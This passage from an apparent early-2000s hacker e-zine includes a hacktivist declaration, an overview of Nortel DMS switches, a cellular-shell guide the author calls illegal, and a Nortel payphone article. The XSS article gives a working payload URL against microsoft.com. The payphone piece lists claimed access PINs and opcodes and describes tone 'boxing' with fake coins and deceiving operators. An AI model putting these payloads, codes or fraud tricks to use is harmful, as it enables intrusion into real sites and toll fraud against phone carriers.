  669. the International Convention on Civil and Political Rights and the Universal
  670. Declaration of Human Rights turn them into a mockery. We are willing to put our
  671. money where our mouth is.
  672.  
  673. Hacktivismo and the CULT OF THE DEAD COW are issuing the HACKTIVISMO DECLARATION
  674. as a declaration of outrage and a statement of intent. It is our Magna Carta for
  675. information rights. People have a right to reasonable access of otherwise
  676. lawfully published information. If our leaders aren't prepared to defend the
  677. Internet, we are.
  678.  
  679. ---------------------------------------------------------------------
  680.  
  681. [1] some information cited in this press release was either paraphrased, or
  682. quoted directly, from the "Enemies of the Internet" report published by
  683. Reporters Without Frontiers, and may be found at http://www.rsf.fr
  684.  
  685. THE HACKTIVISMO DECLARATION assertions of liberty in support of an uncensored
  686. internet
  687.  
  688.  
  689. DEEPLY ALARMED that state-sponsored censorship of the Internet is rapidly
  690. spreading with the assistance of transnational corporations,
  691.  
  692. TAKING AS A BASIS the principles and purposes enshrined in Article 19 of the
  693. Universal Declaration of Human Rights (UDHR) that states, _Everyone has the
  694. right to freedom of opinion and expression; this right includes freedom to hold
  695. opinions without interference and to seek, receive and impart information and
  696. ideas through any media and regardless of frontiers_, and Article 19 of the
  697. International Covenant on Civil and Political Rights (ICCPR) that says,
  698.  
  699. 1. Everyone shall have the right to hold opinions without interference.
  700.  
  701. 2. Everyone shall have the right to freedom of expression; this right shall
  702. include freedom to seek, receive and impart information and ideas of all kinds,
  703. regardless of frontiers, either orally, in writing or in print, in the form of
  704. art, or through any other media of his choice.
  705.  
  706. 3. The exercise of the rights provided for in paragraph 2 of this article
  707. carries with it special duties and responsibilities. It may therefore be subject
  708. to certain restrictions, but these shall only be such as are provided by law and
  709. are necessary:
  710.  
  711. (a) For respect of the rights or reputations of others;
  712.  
  713. (b) For the protection of national security or of public order, or of public
  714. health or morals.
  715.  
  716. RECALLING that some member states of the United Nations have signed the ICCPR,
  717. or have ratified it in such a way as to prevent their citizens from using it in
  718. courts of law,
  719.  
  720. CONSIDERING that, such member states continue to willfully suppress wide-ranging
  721. access to lawfully published information on the Internet, despite the clear
  722. language of the ICCPR that freedom of expression exists in all media,
  723.  
  724. TAKING NOTE that transnational corporations continue to sell information
  725. technologies to the world's most repressive regimes knowing full well that they
  726. will be used to track and control an already harried citizenry,
  727.  
  728. TAKING INTO ACCOUNT that the Internet is fast becoming a method of repression
  729. rather than an instrument of liberation,
  730.  
  731. BEARING IN MIND that in some countries it is a crime to demand the right to
  732. access lawfully published information, and of other basic human rights,
  733.  
  734. RECALLING that member states of the United Nations have failed to press the
  735. world's most egregious information rights violators to a higher standard,
  736.  
  737. MINDFUL that denying access to information could lead to spiritual,
  738. intellectual, and economic decline, the promotion of xenophobia and
  739. destabilization of international order,
  740.  
  741. CONCERNED that governments and transnationals are colluding to maintain the
  742. status quo,
  743.  
  744. DEEPLY ALARMED that world leaders have failed to address information rights
  745. issues directly and without equivocation,
  746.  
  747. RECOGNIZING the importance to fight against human rights abuses with respect to
  748. reasonable access to information on the Internet,
  749.  
  750. THEREFORE WE ARE CONVINCED that the international hacking community has a moral
  751. imperative to act, and we
  752.  
  753. DECLARE:
  754.  
  755. * THAT FULL RESPECT FOR HUMAN RIGHTS AND FUNDAMENTAL FREEDOMS INCLUDES THE
  756. LIBERTY OF FAIR AND REASONABLE ACCESS TO INFORMATION, WHETHER BY SHORTWAVE
  757. RADIO, AIR MAIL, SIMPLE TELEPHONY, THE GLOBAL INTERNET, OR OTHER MEDIA.
  758.  
  759. * THAT WE RECOGNIZE THE RIGHT OF GOVERNMENTS TO FORBID THE PUBLICATION OF
  760. PROPERLY CATEGORIZED STATE SECRETS, CHILD PORNOGRAPHY, AND MATTERS RELATED TO
  761. PERSONAL PRIVACY AND PRIVILEDGE, AMONG OTHER ACCEPTED RESTRICTIONS. BUT WE
  762. OPPOSE THE USE OF STATE POWER TO CONTROL ACCESS TO THE WORKS OF CRITICS,
  763. INTELLECTUALS, ARTISTS, OR RELIGIOUS FIGURES.
  764.  
  765. * THAT STATE SPONSORED CENSORSHIP OF THE INTERNET ERODES PEACEFUL AND CIVILIZED
  766. COEXISTENCE, AFFECTS THE EXERCISE OF DEMOCRACY, AND ENDANGERS THE SOCIOECONOMIC
  767. DEVELOPMENT OF NATIONS.
  768.  
  769. * THAT STATE-SPONSORED CENSORSHIP OF THE INTERNET IS A SERIOUS FORM OF ORGANIZED
  770. AND SYSTEMATIC VIOLENCE AGAINST CITIZENS, IS INTENDED TO GENERATE CONFUSION AND
  771. XENOPHOPIA, AND IS A REPREHENSIBLE VIOLATION OF TRUST.
  772.  
  773. * THAT WE WILL STUDY WAYS AND MEANS OF CIRCUMVENTING STATE SPONSORED CENSORSHIP
  774. OF THE INTERNET AND WILL IMPLEMENT TECHNOLOGIES TO CHALLENGE INFORMATION RIGHTS
  775. VIOLATIONS.
  776.  
  777.  
  778.  
  779. =====================[ Digital Multiplexing System ]=====================
  780. =====================[          by Janus           ]=====================
  781.  
  782.  
  783.  
  784. This article will attempt to explain the DMS (Digital Multiplexing System).
  785. Think of this file as more of a compilation of the material I have read, rather
  786. than something I authored completely from scratch. Special thanks to Control-C
  787. for most of the information found here.
  788.  
  789. -DMS
  790.  
  791. DMS was/is made by Northern Telecom. It was first introduced in 1979. To date,
  792. DMS has been able to interface with such switches as ESS #1-4, Xbar, TSPS, and
  793. EAX. The DMS switch itself is physically smaller than a Xbar switch, and usually
  794. smaller than most AXE switches. This is because the DMS switch is more spread
  795. out, as opposed to other types of switches which are all located in one switch
  796. house. The use of remote modules give the CO more space to install a Line
  797. Concentrating Module (LCM) or Main Distribution Frame (MDF). Many versions of
  798. DMS exist. DMS versions and systems are as follows:
  799.  
  800. 1) DMS-10 - a C5 switch which can be used with up to 10,800 lines. Designed for
  801. rural areas and large businesses. Almost always connected with a larger DMS-100
  802. or -100/200 switch.
  803.  
  804. 2) DMS-100 - a C5 local office able to be used with 1,000 to 100,000 lines. Very
  805. widely used today to handle residential areas' phone lines. A DMS-100 local
  806. office can also be adapted to Equal Access End Office (EAEO)
  807.  
  808. 3) DMS-200 - can be used with up to 60,000 trunks. Can also serve a AT (Access
  809. Tandem) function. The Auxiliary Operator Services System (AOSS) is a part of
  810. DMS-200 that controls Operater-assisted calls, such as Directory Assistance.
  811. AOSS is made possible by Traffic Operator Position System (TOPS) and Operator
  812. Centralization (OC). These 2 functions allow transfer operator services from
  813. other DMS-200 toll centers.
  814.  
  815. 4) DMS 100/200 - Uses functions such as the toll and local systems mentioned
  816. above, but also includes the EAEO/AT combination. Can handle either 100,000
  817. lines or 60,000 trunks.  Used instead of using -100 and -200 seperately.
  818.  
  819. 5) DMS-250 - Not very widely used. Used in association with specialized common
  820. carriers that need tandem switching.
  821.  
  822. 6) DMS-300 - Designed for international use. The number of DMS-300 switches that
  823. are used is in the single digits.
  824.  
  825. 7) Remote Switching Center (RSC) - Used instead of DMS-100, it has the ability
  826. to switch up to 5,760 lines.
  827.  
  828. 8) Remote Line Concentrating Module (RLCM) - Able to switch up to 640 lines. Can
  829. be used with RSC or DMS-100 with assistance from the Line Concentrator Module
  830. (LCM).
  831.  
  832. 9) Outside Plant Module (OPM) - Able to switch up to 640 lines. Can also be used
  833. in association with RSC or DMS-100.
  834.  
  835. 10) Subscriber Carrier Module (SCM or SCM-100) -
  836.  
  837. -a) Subscriber Carrier Module (Rural (SCM-100R)) - Eliminates the CO Central
  838. Control Terminal (CCT) by being integrated with a DMS-100 switch.
  839.  
  840. -b) Subscriber Carrier Module SLC-96 (SCM-100S) - gives a direct link between
  841. DMS-100 and SLC-96 loop carriers.
  842.  
  843. -c) Subscriber Carrier Module Urban (SCM-100U) - Used to interact with DMS-1
  844. Urban (DMS version specialized for use in urban areas.)
  845.  
  846. 11) DMS-Mobile Telephone Exhange (DMS-MTX) - A special type of DMS-100 that is
  847. used with Cellular switching. It can serve up to 50,000 people in up to 50
  848. cells.
  849.  
  850. 12) Supernode -a) DMS-Supernode - Revision of the DMS-100 that supports faster
  851. processing.
  852.  
  853. -b) DMS-Supernode SE - same as above, except in a reduced physical size, and
  854. uses the Link Peripheral Processor (LPP).
  855.  
  856. Important Features of DMS-100:
  857.  
  858. 1) Automatic Route Selection - automatically detects the best trunk for routing
  859. toll and LD calls.
  860.  
  861. 2) Station Message Detail Recording - an enhanced call logging system,keeps
  862. track of times, dates, duration, etc.
  863.  
  864. 3) Direct Inward System Access (DISA) - allows maintenance and administration
  865. from remote terminals.
  866.  
  867. Operator Features included with DMS-200 and -100/200:
  868.  
  869. 1) Traffic Operator Position System (TOPS) - gives certain functions to handle
  870. incoming and outgoing calls.
  871.  
  872. 2) Operator Centralization (OC) - Lets an operator interface with the switch
  873. equipment itself. Allows calls to be routed from a remote DMS switch to a host.
  874.  
  875. DMS is divided into 4 areas that each handle special operations:
  876.  
  877. 1) Central Control Complex (CCC) - Controls the functions that are used in the
  878. other 3 areas. The CCC contains 4 units:
  879.  
  880. -a) Central Processing Unit: Each DMS switch contains 2 CPUs. The CPUs have
  881. access to memory banks where stored programs and network data are located.
  882. Consider the CPUs the "engines" of the switch. They process all incoming data
  883. from outside lines.
  884.  
  885. -b) Program Store Memory Module: Associated with one CPU to contain the program
  886. instructions needed to run programs on the switch. The second PS contains
  887. duplicate instructions.
  888.  
  889. -c) Data Store Memory Module: Contains information such as customer information
  890. and office data. The second DS is a duplicate that is used with the second CPU.
  891.  
  892. -d) Central Message Controller: Controls the messages between the other areas of
  893. the CCC and the Network Message Controller (NMC) in the various Network Modules
  894. or the I/O controller. Both CPUs have access to the CMC.
  895.  
  896. 2) Network (NET) - Network Modules handle the vocal aspect between the
  897. Peripheral Modules and the Central Control Complex (CCC).
  898.  
  899. 3) Peripheral Modules (PM) - Interface between analog trunks, subscriber lines,
  900. and digital carrier spans (DS-1). Responsible for creating dialtones,
  901. sending/receiving signalling, and checking the network.
  902.  
  903. Before 1984, the following types of PMs existed:
  904.  
  905. -a) Trunk Module - Changes speech into digital format to be sent through the
  906. line.  The TM also handles MF tones, test circuit announcement trunks, etc.
  907.  
  908. -b) Digital Carrier Module - gives a digital interface between the DMS switch
  909. and the DS-1 digital carrier. The DS-1 signal consists of 24 voice channels.
  910.  
  911. -c) Line Module - gives an interface for a maximum of 640 analog lines and
  912. condenses the voice and signaling into two, three, or four DS-30, 32-channel
  913. speech links.
  914.  
  915. -d) Remote Line Module - same as above, except it controls the DMS switch
  916. remotely.  Can be used up to 150 miles away.
  917.  
  918. Since 1984, 10 more types were added:
  919.  
  920. -a) Digital Trunk Controller - Interfaces up to 20 DS-1 lines, then sends the
  921. DS-1 lines to the network.
  922.  
  923. -b) Line Group Controller - Can interface up to 20 DS-30 lines, and can serve
  924. RSCs, RLCMs, or OPMs.
  925.  
  926. -c) Line Trunk Controller - has the ability to give interfaces to a maximum of
  927. 20 outside ports from DS-30A speech links or DS-1 links to 16 network side DS-30
  928. speech links.
  929.  
  930. -d) Line Concentrating Module - An expanded version of the LTC, it can serve up
  931. to 640 subscriber lines interfaced with 2-6 DS-30 speech links.
  932.  
  933. -e) Remote Switching Center - interfaces subscriber lines at a remote location
  934. to a DMS-100 host. The RSC consists of the Line Concentrator Module, Remote
  935. Cluster Controller, Remote Trunking, Remote-off-Remote, and Emergency
  936. Stand-alone.
  937.  
  938. -f) Remote Line Concentrating Module - an LCM used from a remote location from
  939. the DMS-100 host. Can handle up to 640 lines, sometimes used as replacement for
  940. PBXs.
  941.  
  942. -g) Outside Plant Module - Outside plant remote unit. Handles 640 lines over 6
  943. DS-1 Links.
  944.  
  945. -h) Subscriber Carrier Module - Remote interface for remote concentrators.
  946.  
  947. -i) SCM-100R - Can interface up to five DMS-1R Terminals. Each terminal can
  948. handle up to 256 lines.
  949.  
  950. -j) SCM-100U - Can interface up to three DMS-1 Urban RTs. Each RT can interface
  951. up to 576 POTS or special service lines.
  952.  
  953. 4) Maintenance and Adminstration - DMS provides different ways to maintain and
  954. administrate the network. M&A is divided into 4 major groups:
  955.  
  956. -a) Administrative: Provides for the interrogation, collection and modification
  957. of data.
  958.  
  959. -b) Internal Maintenance: Includes all DMS hardware (to the MDF) and software.
  960.  
  961. -c) External Maintenance: Includes circuits on the transmission facility.
  962.  
  963. -d) Reporting: Include I/O facilities and the alarm system.
  964.  
  965. Common Channel Interoffice Signalling (CCIS) uses a dedicated line to transmit
  966. data between offices, trunks, or trunk groups. CCIS-6 uses the International
  967. Consultative Committee on Telephone and Telegraph (CCITT) No. 6 international
  968. standard. CCIS-7 added the ability to use CCIS with almost all common DMS
  969. versions such as DMS-100, -200, -100/200, and -100/200 with TOPS. CCIS-6 uses 2
  970. types of Serving Offices (SO):
  971.  
  972. 1) CCIS-BS: used for trunk signalling between COs. Transmits data such as
  973. numbers dialed, number dialed from, and other routing information. CCIS-BS put
  974. an end to Blue Boxing.
  975.  
  976. 2) CCIS-DS: enables the use of touch-tone menu administration, such as voice
  977. mail, calling card input, and so forth.
  978.  
  979. Access Tandems:
  980.  
  981. 1) Equal Access (EA) gives a connection between Local Access and Transport Areas
  982. (LATA).  It provides such services as ANI, Automatic Message Accounting (AMA)
  983. for both originating and terminating calls, and operator service signaling.
  984.  
  985. 2) Equal Office End Office (EAEO) gives a connection between interLATA carriers
  986. and international carriers' POP.
  987.  
  988. 3)Access Tandem with Equal Access End Office gives a connection from a trunk
  989. tandem to ICs/INCs POP inside a LATA. It uses a two-stage "overlap output
  990. pulsing" method which makes dialing quicker and easier. The first stage
  991. identifies the INC dialed and picks a reliable outgoing trunk. A connection is
  992. established from the INC to the EAEO through the access tandem. The second stage
  993. processes ANI and makes a connection to the called number through your specific
  994. DMS switch type.
  995.  
  996. 4) Access Tandem with a Non-Equal End Office uses Feature Group A, B, or C to
  997. connect to an IC/INC. It uses standard Central Automatic Message Accounting
  998. (CAMA) to place a call through an AT.
  999.  
  1000. Other services provided with DMS switches used in urban areas:
  1001.  
  1002. 1) Auxiliary Operator Services System (AOSS) - used primarily for directory
  1003. assistance, and the intercept needs not included with TOPS.
  1004.  
  1005. 2) Integrated Business Network (IBN) - commercial concept designed for business
  1006. to have a small, private PBX. IBN can be installed into a business to a Centrex
  1007. Control Office or a Centrex Costumer Unit with minor hardware adjustments.
  1008. Features of IBN include the ability to handle 30,000 lines, customer call
  1009. records, centralized attendant maintenance, administration functions, and direct
  1010. inward dialing.
  1011.  
  1012. 3) Electronic Switched Network (ESN) - designed to meet needs of multi- location
  1013. complexes. Used with SL-1 or -100 Digital Business Communications Systems with
  1014. networking features or a DMS-100 IBN host.
  1015.  
  1016. 4) Specialized Common Carrier Service (SCCS) - provides conversion of analog and
  1017. digital signals. Must be used with older analog lines, sometimes also used with
  1018. newer digital lines.
  1019.  
  1020. DMS-MTX is a DMS switch used for switching radio and cellular signals. DMS
  1021. switches provide 3 basic types of cell switching:
  1022.  
  1023. 1) Stand-alone switching is used by a MTX which is interfaced with one or more
  1024. C5 EOs with DID trunks. MTX is used with urban areas, MTXC for suburban areas,
  1025. and MTXM for rural areas.
  1026.  
  1027. 2) Combined switching is the most cost-effective type of MTX and is easy to
  1028. install. It can be incorporated into a DMS-100 switch and used with cellular
  1029. software.
  1030.  
  1031. 3) Remote switching is accomplished by the Remote Switching Center (RSC)
  1032. alongside a Cell Site Controller (CSC). A Remote or Stand-alone switch hosts the
  1033. remote switch. Remote switching is not used in urban areas.
  1034.  
  1035. ___________ Suggested Reading:  Understanding DMS; Control-C; 1987 (Most of my
  1036. information came from here!) DMS Family of Digital Switching Systems; Erudite;
  1037. ????  DMS-100; Jester Sluggo; ????  DMS-100 Family System; Northern Telecom;
  1038. 1978
  1039.  
  1040. --Janus hijanus@tupac.com
  1041.  
  1042.  
  1043.  
  1044. =================[Cross Site Scripting the Security Gap]=================
  1045. =================[           by Tamer Sahin            ]=================
  1046.  
  1047.  
  1048.  
  1049. I wonder if Microsoft applies the patches on their systems of their products.
  1050. This question is always on my mind. I personally think that sufficient effort is
  1051. not made on this topic,and with a little amount of investigation about it,i've
  1052. found out that a very simple security threat is still standing at the
  1053. microsoft.com web site.This problem ,of course,does not have a direct harm on
  1054. the server,but may turn out to be annoying if used indirectly.Yes,the name of
  1055. this security gap is ""Cross Site Scripting" .This security gap ,which was
  1056. discovered by Georgi Guninski, looks like it might cause some problems in banks
  1057. and some places where online shopping is done.
  1058.  
  1059. Can Be Done About It ? I want to talk a little bit about "Cross Site Scripting".
  1060. This security gap was announced in the preceding months.By means of it ,many
  1061. commands can be run on the user's browsers via the intented sites; with the help
  1062. of some scripts ,some processes such as reading files from their discs, or even
  1063. diverting them to other sites can be held out. These kind of security threats
  1064. are big deal for financial settings or for the institutes which provide shopping
  1065. via net ( In one of the commercials of a bank in Turkey, people sit in a car
  1066. ,lock the doors ,and with a spontaneous fantasy ,show their id cards to the ones
  1067. who have come out to do banking processes ,to verify the reliability of the site
  1068. . However ,there is this problem in a large amount of sites,but what surprised
  1069. me was to find out that you can see this security gap in microsoft ,too ,which
  1070. has delivered a patch for this problem.
  1071.  
  1072. Practice Any asp operating on the site (could be a search engine or could as
  1073. well be null.htw kind of script ) can be run making an addition to the <script>
  1074. figure. I am going to tell how it is run with a minimum code, now. It is not
  1075. difficult at all to write more specific scripts , a little amount of imagination
  1076. could be much more annoying then it is thought,as a security gap. Yes,as i have
  1077. mentioned before,it is not that big deal to alter the properties of this script
  1078. ,that's only a minimum instance. Now the hack theories...
  1079.  
  1080. Theory? The problem that arised in microsoft ,is the null.htw file which is
  1081. saved on the server.The majority of us (?) delete .htw .idq etc ending scripts
  1082. ,or arrange their permissions so that we permit their usage. It looks like the
  1083. Microsoft didnt feel a necessity such that . Writing an url as below,we can run
  1084. the "Cross Site Scripting" security gap ,with the help of null.htw:
  1085.  
  1086. http://www.microsoft.com/null.htw?CiWebHitsFile=/default.asp&CiRestriction=
  1087. "<SCRIPT>alert('Helloo!!');</SCRIPT>"
  1088.  
  1089.  
  1090.  
  1091. The Solution You can find a code below ,which can be used for the "Cross Site
  1092. Scripting" attacks on forms etc.With means of this code ,the transfer of the
  1093. large sized script blocks with the "onsubmit" method will be prevented and
  1094. warning signals will be sent for the figures such as "% < > [ ] { } ; & + - " '
  1095. ( )" not executing them .
  1096.  
  1097. <PRE class=CodeForeground>function checkForm() {
  1098. document.forms[0].userName.value = _
  1099. RemoveBad(document.forms[0].userName.value); return true; } // Bad Characters
  1100. function RemoveBad(strTemp) { strTemp =
  1101. strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, ""); return
  1102. strTemp; } </PRE>
  1103.  
  1104.  
  1105.  
  1106. Offical Patch http://www.microsoft.com/technet/security/bulletin/MS00-060.asp
  1107.  
  1108. Tamer Sahin Hacking Officer http://www.tamersahin.net feedback@tamersahin.net
  1109.  
  1110.  
  1111.  
  1112. =============[Shell/PPP Connectivity over Cellular Networks]=============
  1113. =============[                   by engel                  ]=============
  1114.  
  1115.  
  1116.  
  1117.  
  1118. This hasn't been fully tested (I've only tested the shell portion). It's up to
  1119. you to try out the PPP connection. In theory, it should work, but it's going to
  1120. be really slow.) And be forewarned, this is illegal. Everything you do based on
  1121. this is your choice, not mine. I am only supplying information, and I am not
  1122. responsible for your actions. If the FCC comes a knocking, don't be bitching to
  1123. me or LoU about your legal engagements. It is your fault if you get caught doing
  1124. any of the below in practice. Not mine.
  1125.  
  1126. The idea came to me a few months ago when I was in my friend's car, wishing that
  1127. I could nab a few files off my system when we were on the road. It completely
  1128. dawned on me a few minutes later when I was playing with my Motorola 2800
  1129. bagphone. I had to find a way to make a network connection to my main server
  1130. back at my (old) house. And I figured cellular communication was the way to go.
  1131.  
  1132. I went home later that day, and dug around my box full of (mostly) various
  1133. electronics and phone equipment. I found an old US Robotics 28.8 ext. modem,
  1134. RJ-11 -> Motorola TeleTAC adapter (For modems, duh.) and my old acoustic
  1135. coupler. I threw the external modem on my server, then ran some RJ11 to the
  1136. adapter, and connected the adapter to the TeleTAC. Whee.
  1137.  
  1138. Now, client side, I popped the coupler onto the 2800, then connected it to my
  1139. amazing 14.4 on the lappy. Now how the fuck did I establish the god damn
  1140. connection? This is going to be a bit lengthy, so let's list it out.
  1141.  
  1142. 1) I edited my inittab (/etc/inittab) and added a dialup term. (You can find
  1143. it.)
  1144.  
  1145. 2) Popped both cellphones into testmode. Nothing like FCN-00-**-83786633-STO.
  1146. Then I popped them onto an unused channel. And then (gasp) put them into Rx/Tx
  1147. mode by doing the following.  a) 08# b) 10# c) 05# d) 353#
  1148.  
  1149. Oh my. I think we can hear ourselves talk over the channel. Isn't that special?
  1150.  
  1151. 3) On the external modem, I threw a switch on it that said 'Auto Answer'. Now, I
  1152. realize this isn't on all Externals, and I should recommend that you find one,
  1153. wheter it's at a Goodwill, or a vintage computer store.
  1154.  
  1155. 4) Started minicom on the laptop. And typed in the magical string, ATD.
  1156.  
  1157. Boom. That's all it took. I got an amazing 19.2 connection over the cellular
  1158. link. Now, could you get a higher connection with faster modems? No, dumb ass.
  1159. You can probably get a 28.8 connection, but it will most likely time out.
  1160.  
  1161. Now, unless you have some really old towers around your area that actually
  1162. forward channels through different towers (i.e. You're driving down the road,
  1163. and you're out of the original tower's range, then you switch over.) you're
  1164. going to get disconnected if you pass the limited range of your tower, which is
  1165. anywhere between 6 to 10 miles. There is only a couple ways around that, but I'm
  1166. sure you can figure them out within a few hours, minutes, or seconds from now.
  1167.  
  1168. Okay, so you have yourself a cellular shell. Whoop dee doo. Now if you can
  1169. actually make a networked connection over the link, that would be nice, eh?
  1170. Well, using the wonderful PPP protocol, we can!
  1171.  
  1172. Add a new user on your host, name it whatever the fuck you want. Now, for the
  1173. shell, make sure it's /usr/sbin/pppd. Make a new file in your favorite editor
  1174. called .ppprc and put it in the user's $home. Put the following in it.
  1175.  
  1176.  
  1177. connect -detach modem crtscts lock :192.168.100.4
  1178.  
  1179. Whoop, there it is. Now on the client side, make a ppp script that logs in as
  1180. that user. And that's all she wrote. It should work, but I make no guarantees
  1181. whatsoever, since I never tested it.
  1182.  
  1183. So play around with it, if you dare. Mail me some followups, additions, and so
  1184. on also, I'd like to hear some new ideas to add to this simple project. Next
  1185. time, I'll get in depth with more wireless networking projects for your geeky
  1186. enjoyment.
  1187.  
  1188. http://www.phonegeek.org
  1189.  
  1190.  
  1191.  
  1192. =====================[ Nortel Millennium Payphones ]=====================
  1193. =====================[          by ^CircuiT^       ]=====================
  1194.  
  1195.  
  1196.  
  1197.  
  1198. Well for you people out there that don't know what a millennium pay phone looks
  1199. like, I'll start out by telling you. There are many different types of
  1200. millennium payphones and none of them look the same, so instead of siting here
  1201. and trying to describe them all I have a few pictures with this file. The most
  1202. common Millennium payphone is the M1231 and since it is the most common that is
  1203. the one I will talk about most in this file. For the rest of them look at the
  1204. end of this file. The M1231 is black with a silver front and a two line LED
  1205. screen that can be reprogrammed to say other things, such as "Mr. T was here"
  1206. but ill be getting into the reprogramming of that a bit later. Under the LED
  1207. screen there are four buttons the first two control the volume. The next one
  1208. controls the languages, for example English to Spanish or English to French. For
  1209. you people in Canada and the last button hangs up your in order to make another
  1210. call. At the top of the phone it's blue and at the bottom there is a yellow card
  1211. reader for smart cards, credit cards, and other calling cards such as MCI
  1212. calling cards. Just above the yellow card reader there are five more buttons
  1213. that the owner/local phone company can program to do what ever they want. There
  1214. are two different versions of the M1231 ver1.0 does not have a RJ-11 jack but
  1215. the ver2.0 does. The RJ-11 jack is there so you can plug your laptop into the
  1216. phone and connect to the Internet. (The M1231 ver2.0 is mostly in airports)
  1217.  
  1218. Well know that you know what they look like let's get into the security of the
  1219. pay phone. It has four keyholes as you might have seen by just looking at it.
  1220. The two keyholes on the top and left-hand side of the phone are for changing the
  1221. LED screen. There is another keyhole under neather the yellow card reader that
  1222. is for changing the coin box and on the side of the coin box there is yet
  1223. another keyhole, you need both keys to open the coin box. You will also need an
  1224. access code (or pin) to get to the coin box (this is not yet confirmed). Another
  1225. little bit of security the phone has is an alarm some are silent and some are a
  1226. loud beep. When the alarm is set off the phone calls a set number and notifies
  1227. them that there is a problem. There are some security rumors flying around, such
  1228. as there is a tracking device in the phone and that if a phone stolen and then
  1229. hook-up to a new phone line it will automatically call a set number.
  1230.  
  1231. Ok, now that you know about the phones security and how to open it, lets get
  1232. into the internal hardware workings of the phone. Unlike other payphones the
  1233. Nortel Millennium payphone has a built in computer and modem the computer is
  1234. called the "Millennium Manager" and it keeps a log of every call made form the
  1235. phone including (800, 888, 877, 911, 611, 411, 311, and 0). It also keep track
  1236. of how the person paid for the call ( collect, card, cash), and also keeps tabs
  1237. on how many coins are in the coin box and if anything else goes wrong in the
  1238. phone such as the card reader or LED screen it calls a set number and tells
  1239. them, and a log of every time the phone is opened or the coin box is opened or
  1240. if someone changes the display screen. A tool called the "Millennium Maximizer"
  1241. accesses all this but not much is yet known about this. So as I get that
  1242. information I will release it. On to the yellow card reader. Once you have
  1243. opened the phone you should be able to remove the yellow card reader with
  1244. stander tools such as a screwdriver...etc. Once you have the yellow card reader
  1245. you should be able to hook it up to your home computer and read cards with it
  1246. but with what software I don't know. Some people say that you can modify cards
  1247. with it as well but I have seen nothing that would indicate that. Ok now that
  1248. all that stuff is out of the way lets talk about that little two line LED sign.
  1249. To change the display this is what you must do first: You will need two keys one
  1250. for the top and the one for the left-hand side. After unlocking them you will
  1251. have to enter an access code (or pin) from the keypad. (If you don't enter the
  1252. pin an alarm will sound.) Then you can remove the top part of the phone in side
  1253. you will find a port that you can plug in a Millennium Maxmizer.
  1254.  
  1255. Ok people, we've made this far so let get straight into the software aspect of
  1256. the phone starting off with the Millennium Manager. The Millennium Manager is
  1257. the program the phone's computer runs, it keep track of everything as I said
  1258. above and that's all I know at this point about the manager. Now onto the
  1259. Opcodes. Opcodes are short strings of number that are pre-set functions on
  1260. Millennium payphones but you must correctly enter a pin before you have the
  1261. chance to input an Opcode. I have heard from other people that you can dial
  1262. 2541965 or yet another code that is CRASERV or in numbers 2727378 with the hook
  1263. down. After you dialed it you should be asked for an access code (or pin). One
  1264. known pin is 25563. After you entered the PIN you could enter any Opcode. Here
  1265. are a list of opcodes:  267# Answer detect 274# Display brightness control
  1266. (down?) 277# Display brightness control (up?) 349# Unknown 636# memory access
  1267. 688# Unknown 66666# motor sound prompts to open phone - probably coin removal
  1268. 996# error has occurred. (Please note these codes are what people have told me I
  1269. have not getten them to work.) Some other software aspects of the phone is the
  1270. fake dial tone, its only a recording. You would know this if you ever picked one
  1271. up cause you hear the fake dial tone and some op telling you to "insert your
  1272. card". So what happens is you dial the number your calling put your money in and
  1273. the computer dials it so you never get the chance to hear a real dial tone. You
  1274. might be asking yourself if I don't ever hear a real dial tone can I box a call
  1275. off a millennium phone. The answer is yes and no. Yes you can box local calls, I
  1276. do it all the time just hit 0 for the op and tell her the phone's keypad is
  1277. messed up and ask her to dial for you then drop in your tones. The No is for
  1278. boxing long distances calls, the Op's don't really like it when you put in $3.50
  1279. in fake coins.
  1280.  
  1281. One of the most fun things I have found about the millennium phone is that you
  1282. can use it as a DTMF decoder. It's really simple to all you do is take you
  1283. recorded DTMF tone to the phone and play them really loud into the month piece
  1284. of the phone the numbers will show up on the LCD screen and there you go, you
  1285. got a DTMF decoder.
  1286.  
  1287. Well we have covered a hole lot about the millennium payphone but theres still a
  1288. little bit to cover like the fact that millennium phones have a ringer but never
  1289. ring. The reason for this is because if you call a millennium phone you will one
  1290. of about four different msg saying things like " this line is for out going
  1291. calls only " or " the number *** - **** is out of serves ". The reason Nortel
  1292. did this was because they didn't want drug dealers hanging out by the phone
  1293. waiting for a call. If you act like a really nice person you can call the op and
  1294. ask her to call you back on it "but wait a min you said they cant get incoming
  1295. calls". Well they can but only from an op see when you call her this pop's up on
  1296. her screen 0 (+) MIL_UNIV or 0 (+) MIL_CARD plus your location so she thinks why
  1297. call them back? But if you convince her who knows you might of made that phone
  1298. ring for the first time ever.
  1299.  
  1300. Ok now that we are done with everything lets talk about all the other millennium
  1301. phones. Well since I haven't used any of these phone yet, so I don't have much
  1302. to talk about so I put in here what Nortell has to say about there phone from
  1303. there web page and if your reading this out of the zip you got pictures with
  1304. this file. Enjoy.
  1305.  
  1306. The M1000 Public communications access terminals need to be ready for the future
  1307. -- even if they accept only coins today. The Millennium M1000 Coin Basic
  1308. Terminal is an ideal solution for low-revenue sites because it keeps the door
  1309. open to future expansion by allowing you to add options quickly and easily in
  1310. the field. For example, you can install a 2-line x 20-character illuminated
  1311. display that can help you generate new sources of revenue. And to further
  1312. increase payphone usage, you can add the optional card reader. Driven by
  1313. Millennium Manager, this payphone workhorse protects your investment and revenue
  1314. stream with electronic coin validation, anti-fraud capabilities and
  1315. anti-vandalism features.
  1316.  
  1317. The M1131 This terminal is the perfect solution for service providers who want
  1318. to offer advanced public communications access while eliminating the cost of
  1319. handling coins. The Millennium M1131 Card Only Terminal handles card
  1320. transactions with ease allowing customers to use a variety of cards, including
  1321. calling cards, credit cards, cash cards and smart cards. Card customization
  1322. programs provide another opportunity to further differentiate yourself from the
  1323. competition by making branding and image advertising possible. And like all
  1324. Millennium terminals, the Card-Only Terminal offers intelligent features such as
  1325. call statistics, self-diagnostics and alarms, store-and-forward routing, voice
  1326. prompts and call rating. Simple to install and maintain, these terminals are
  1327. backed by the powerful, fault-tolerant Millennium Manager.
  1328.  
  1329. The M1231 The More payment options mean more customers. From coins to calling
  1330. cards, credit cards, cash cards and smart cards -- the Millennium M1231 MultiPay
  1331. Terminal accepts them all. And with so many options, gaining and retaining
  1332. customer loyalty is as simple as picking up the phone. Millennium MultiPay
  1333. Terminals are changing the scope of customer expectations and the future of
  1334. public payphones. The RJ-11 data jack provides Internet access and enables data
  1335. calls. A scrolling display can double as a billboard for advertising and
  1336. cross-selling promotions. Quick Access Keys speed revenue generation and allow
